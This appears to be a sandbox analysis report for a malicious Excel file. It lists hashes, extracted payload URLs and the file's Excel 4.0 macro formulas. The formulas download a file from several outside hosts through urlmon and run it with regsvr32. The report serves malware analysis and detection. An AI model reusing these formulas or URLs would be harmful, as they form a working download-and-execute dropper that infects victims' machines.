General
-
Target
7ac32d506f20689756a895f8825945954af091335d6f8387b6b36808d3d1fc9c
-
Size
90KB
-
MD5
b4cf8a517aa0695ee3ee1b49510bdd09
-
SHA1
ef326a415f65d08d2ac500330df76e55945764b5
-
SHA256
7ac32d506f20689756a895f8825945954af091335d6f8387b6b36808d3d1fc9c
-
SHA512
1e89664070d8b9a755505f5f049a91b4bc6eb36e8a0402b6b1834eb5fe0e8dcd4666aafbbab6d033aaaec22bd93cca2ab91867d65a5bf03fe008877ff43419af
-
SSDEEP
1536:jQBrnXpnyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xXPd:KDpyVEoBo6hKb4llGsQjbxfd
Malware Config
Extracted
http://www.ajaxmatters.com/c7g8t/zbBYgukXYxzAF2hZc/
http://www.beholdpublications.com/home/BABxyyWZx8Vu/
http://explorationit.com/screwing/AxLm/
http://donboscoschoolputhuppally.org/wp-content/UuQ7LBsPoGu9Q/
http://myclassroomtime.com/mongery/ZlPsROtQiXIujmJmAA/
-
formulas
=FORMULA() =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ajaxmatters.com/c7g8t/zbBYgukXYxzAF2hZc/","..\xxw1.ocx",0,0) =IF('EGFAGAGDGE'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.beholdpublications.com/home/BABxyyWZx8Vu/","..\xxw1.ocx",0,0)) =IF('EGFAGAGDGE'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://explorationit.com/screwing/AxLm/","..\xxw1.ocx",0,0)) =IF('EGFAGAGDGE'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://donboscoschoolputhuppally.org/wp-content/UuQ7LBsPoGu9Q/","..\xxw1.ocx",0,0)) =IF('EGFAGAGDGE'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://myclassroomtime.com/mongery/ZlPsROtQiXIujmJmAA/","..\xxw1.ocx",0,0)) =IF('EGFAGAGDGE'!D23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx") =RETURN()
Signatures
-
Suspicious Office macro 1 IoCs
Office document equipped with 4.0 macros.
Files
-
7ac32d506f20689756a895f8825945954af091335d6f8387b6b36808d3d1fc9c